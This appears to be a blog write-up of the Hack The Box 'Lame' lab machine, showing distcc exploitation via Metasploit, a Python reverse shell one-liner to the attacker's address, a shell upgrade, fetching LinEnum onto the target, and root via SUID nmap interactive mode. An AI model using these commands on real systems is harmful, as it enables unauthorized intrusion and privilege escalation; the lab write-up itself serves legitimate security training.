In my last post, I used Metasploit to exploit a SMB vulnerability
on HTB’s Lame and get root right off the bat. But, we also found that another vulnerable
application – distcc – was listening on port 3632. Let’s run through that and then do some privilege
escalation.
Check out my previous post here:
First, let’s hit up El Goog to see what known exploits
are available for distcc.
The very first link leads us to Rapid7’s page for a
Metasploit module. So, let’s give it a try.
root@kali:~# msfconsole
[-] ***rting the
Metasploit Framework console...|
[-] * WARNING: No
database support: No database YAML file
[-] ***
Unable to handle
kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx:
f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi:
8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018
ss: 0018
Process Swapper (Pid:
0, process nr: 0, stackpage=80377000)
Stack:
90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
Code: 00 00 00 00 M3
T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing
Interrupt handler
Kernel panic:
Attempted to kill the idle task!
In swapper task - not
syncing
=[
metasploit v5.0.4-dev
]
+ -- --=[ 1852
exploits - 1047 auxiliary - 325 post
]
+ -- --=[ 541 payloads
- 44 encoders - 10 nops ]
+ -- --=[ 2
evasion
]
msf5 > search
distcc
Matching Modules
================
Name Disclosure Date Rank
Check Description
---- --------------- ----
----- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes
DistCC Daemon Command Execution
msf5 > use
exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > set
rhosts 10.10.10.3
rhosts =>
10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse
TCP double handler on 10.10.14.15:4444
[*] Accepted the first
client connection...
[*] Accepted the
second client connection...
[*] Command: echo
uANPhYOytemCLjCC;
[*] Writing to socket
A
[*] Writing to socket
B
[*] Reading from
sockets...
[*] Reading from
socket B
[*] B:
"uANPhYOytemCLjCC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell
session 1 opened (10.10.14.15:4444 -> 10.10.10.3:51297) at 2019-04-11
07:01:05 -0400
Now that we have a remote shell, let’s verify we’ve come to the right place and see who we are running as.
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b2:4d:ba
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr:
dead:beef::250:56ff:feb2:4dba/64 Scope:Global
inet6 addr:
fe80::250:56ff:feb2:4dba/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500
Metric:1
RX packets:183209 errors:0 dropped:0
overruns:0 frame:0
TX packets:4631 errors:0 dropped:0
overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:13626432 (12.9 MB) TX bytes:739675 (722.3 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436
Metric:1
RX packets:40148 errors:0 dropped:0
overruns:0 frame:0
TX packets:40148 errors:0 dropped:0
overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:20057083 (19.1 MB) TX bytes:20057083 (19.1 MB)
id
uid=1(daemon) gid=1(daemon)
groups=1(daemon)
We are in, but not root. Time to gather some more information to
see what our priv esc options are. But first, I want to upgrade this shell to
be fully interactive. Unfortunately, Metasploit isn’t a great place to do this
because of its session management. So let’s pop another reverse shell back to
our Kali box and then upgrade it.
First, I start a netcat listener.
root@kali:~# nc -nvlp 9001
listening on [any] 9001 ...
Then, I’ll run this Python reverse shell on the target box. This can be found on pentestmonkey (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",9001));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We catch the reverse shell on the Kali box.
root@kali:~# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.3] 49674
sh: no job control in this shell
sh-3.2$
Now to upgrade. I always copy and paste the commands from this guide
when upgrading shells: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/.
Check out the full guide for some other tips.
sh-3.2$ python -c
'import pty; pty.spawn("/bin/bash")'
daemon@lame:/tmp$
[CTRL] + [Z] to background the netcat process
[1]+ Stopped nc -nvlp 9001
root@kali:~# stty raw
-echo
root@kali:~# fg
Hit [ENTER] a few times.
Hit [ENTER] a few times.
We now have a fully interactive shell with tab completion.
Next, I want to download and run LinEnum.sh on the target box. LinEnum
is a privilege escalation enumeration script and automates a lot of the tedium involved
in priv esc.
LinEnum on Github: https://github.com/rebootuser/LinEnum
First, from my Kali box:
Use wget to download the script from Github.
root@kali:~/htb/lame/privesc# wget
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-04-11 07:44:15--
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)...
151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com
(raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: ‘LinEnum.sh’
LinEnum.sh
100%[============================================>] 44.57K
--.-KB/s in 0.03s
2019-04-11 07:44:15 (1.30 MB/s) - ‘LinEnum.sh’ saved [45639/45639]
And then use the python module SimpleHTTPServer to host it.
root@kali:~/htb/lame/privesc# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Now from the target, I use wget to download the script.
daemon@lame:/tmp$ wget 10.10.14.15/LinEnum.sh
--06:49:19--
http://10.10.14.15/LinEnum.sh
=>
`LinEnum.sh.1'
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45,639 (45K) [text/x-sh]
100%[====================================>] 45,639 --.--K/s
06:49:19 (359.15 KB/s) - `LinEnum.sh.1' saved [45639/45639]
Make the script executable using chmod.
daemon@lame:/tmp$ chmod +x LinEnum.sh
And then execute. I’m using -t for thorough scans and then
outputting the results to file, LinEnum.results.
daemon@lame:/tmp$ ./LinEnum.sh -t > LinEnum.results
Exerpt from Linenum.results:
[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
Looking through the results, I noticed the nmap is owned by root
and has the SUID bit set. This means we can execute the binary as root. For
some more info on SUID, check this out: https://pentestlab.blog/2017/09/25/suid-executables/
Fortunately for us, nmap can be run in interactive mode and this
will be our path to root.
Start nmap in interactive mode:
daemon@lame:/tmp$ /usr/bin/nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap>
I'll see what privileges I have first. Use ! to enter shell commands.
nmap> !id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
And then launch another bash session.
nmap> !sh
sh-3.2#
And we’re golden. I can now collect the flag in root.txt.
sh-3.2# cat /root/root.txt
92caac3be140ef****************
No comments:
Post a Comment